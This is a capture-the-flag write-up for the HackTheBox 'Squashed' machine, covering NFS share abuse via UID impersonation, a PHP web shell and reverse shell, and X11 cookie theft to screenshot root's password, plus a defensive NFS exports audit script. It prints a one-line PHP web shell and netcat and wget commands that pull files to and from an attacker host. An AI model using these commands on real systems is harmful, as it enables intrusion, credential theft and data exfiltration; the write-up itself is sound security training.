We enumerate NFS shares and upload a web shell. We also perform Linux privilege escalation by getting an X11 magic cookie from a different NFS share and using it to take a screenshot of the current user's desktop, which shows the root password in a password manager. This was part of the HackTheBox Squashed machine.
Squashed is an Easy Difficulty Linux machine that features a combination of both identifying and leveraging misconfigurations in NFS shares through impersonating users. Additionally, the box incorporates the enumeration of an X11 display into the privilege escalation by having the attacker take a screenshot of the current Desktop.
Initial Enumeration & Gaining Access
I started with an nmap scan to identify open ports, which revealed ports 22 (SSH), 80 (HTTP), 111 (RPCbind), and 2049 (NFS).
Next, I focused on enumerating NFS shares using showmount -e <IP_ADDRESS>. I found two shares: /home/ross and /var/www/html.
I then mounted the /var/www/html share. Initially, listing its contents resulted in "permission denied." I checked the directory permissions and saw a user ID of 2017 and group www-data. To gain access, I created a new local user named squashed with the same UID (2017) using useradd squashed and usermod -u 2017 squashed. After switching to this new user with su squashed, I could successfully list the contents of the mounted /var/www/html share.
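The UID trick works because an NFS server using the default AUTH_SYS security maps whatever UID the client presents straight to a local UID unless the export squashes it. As an added defensive check (not part of the writeup or the box), the following script audits a constructed /etc/exports for exactly the properties that made this share abusable: wildcard hosts, writable exports, no root squashing, client UIDs trusted, and sensitive paths such as a webroot or home directory.

```python
import re

# Constructed sample /etc/exports (assumed content; the box only shows showmount output).
SAMPLE_EXPORTS = """\
/var/www/html *(rw,sync,no_subtree_check)        # webroot, any host, UIDs mapped 1:1
/home/ross 10.10.0.0/16(rw,no_root_squash)      # home dir, root not squashed
/srv/pub 10.10.11.0/24(ro,all_squash,sec=krb5p) # tighter: read-only, squashed, Kerberos
"""

SENSITIVE_PREFIXES = ("/home", "/root", "/var/www", "/etc")

def parse_exports(text):
    """Yield (path, client, option-set) for every client spec in an exports file."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # '#' starts a comment to end of line
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs:
            m = re.fullmatch(r"([^()]*)(?:\((.*)\))?", spec)
            client = m.group(1) or "*"         # a bare "(opts)" means every host
            opts = set(m.group(2).split(",")) if m.group(2) else set()
            yield path, client, opts

def audit_exports(text):
    """Return {(path, client): [issues]} for every export with a risky property."""
    findings = {}
    for path, client, opts in parse_exports(text):
        issues = []
        if "*" in client or "?" in client:
            issues.append("exported to any host")
        if "rw" in opts:                       # exports default to ro
            issues.append("writable")
        if "no_root_squash" in opts:           # exports default to root_squash
            issues.append("root not squashed")
        # Without all_squash and without Kerberos (sec=krb5*), the server trusts the
        # UID the client sends: exactly what the useradd/usermod -u 2017 step exploited.
        kerberos = any(o.startswith("sec=") and "sys" not in o for o in opts)
        if "all_squash" not in opts and not kerberos:
            issues.append("client-supplied UIDs trusted (no all_squash, AUTH_SYS)")
        if path.startswith(SENSITIVE_PREFIXES):
            issues.append("sensitive path")
        if issues:
            findings[(path, client)] = issues
    return findings
```

Run audit_exports() over the real file on an NFS server to get the same report; the Kerberos-protected, all_squash export produces no findings.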
Since this was the webroot and I had write access, I created a simple PHP web shell using echo '<?php system($_GET["cmd"]); ?>' > shell.php. I then copied a more robust PHP reverse shell (from PenTestMonkey) to the mounted webroot. Accessing this PHP reverse shell via the browser granted me an initial shell as the user "Alex".
Privilege Escalation via X11 Authorization
In Alex's home directory, I noticed an Xauthority file, but it was initially inaccessible. I then mounted the /home/ross NFS share to access Ross's Xauthority file. After unmounting the previous share and creating a new directory for this mount, I viewed the content of Ross's Xauthority file (a magic cookie).
I transferred this Xauthority file from the mounted share (acting as a server) to the compromised machine (Alex's shell) using wget. Before that, I started a Python web server on my attacker machine in the directory containing the Xauthority file. On the victim machine, as Alex, I ran wget http://<ATTACKER_IP>:<PORT>/Xauthority.
My goal was to see which users were connected to the X display and impersonate them. I used the w command to find the display ID, followed by xdpyinfo -display :0 for more display information. I then used xwininfo -root -tree to check if the root user was connected to the display, which it was!
Since root was connected, I took a screenshot of the X display, as the scenario implied the root user might have left a KeePass window open with credentials. I used the command xwd -root -display :0 -out screenshot.xwd to capture the screenshot and saved it to /tmp/squashed_root.
I then transferred the screenshot file (.xwd) from the victim machine to my attacker machine using netcat. On my attacker machine, I set up a listener with nc -lvnp <PORT> > screenshot.xwd, and on the victim machine, as Alex, I sent the file with cat /tmp/squashed_root | nc <ATTACKER_IP> <PORT>.
Finally, I converted the .xwd file to a .png file using ImageMagick tools. I installed them with sudo apt update && sudo apt install imagemagick, and then converted the file with convert screenshot.xwd screenshot.png. Opening the PNG revealed the root username and password from the KeePass window. I then used the su root command with the obtained root credentials to gain root access.
Alternative Mentioned
The video also mentioned an alternative method: using Metasploit with an X11 exploit to get a shell on the display server if screenshotting doesn't yield useful information. This method also requires the Xauthority file.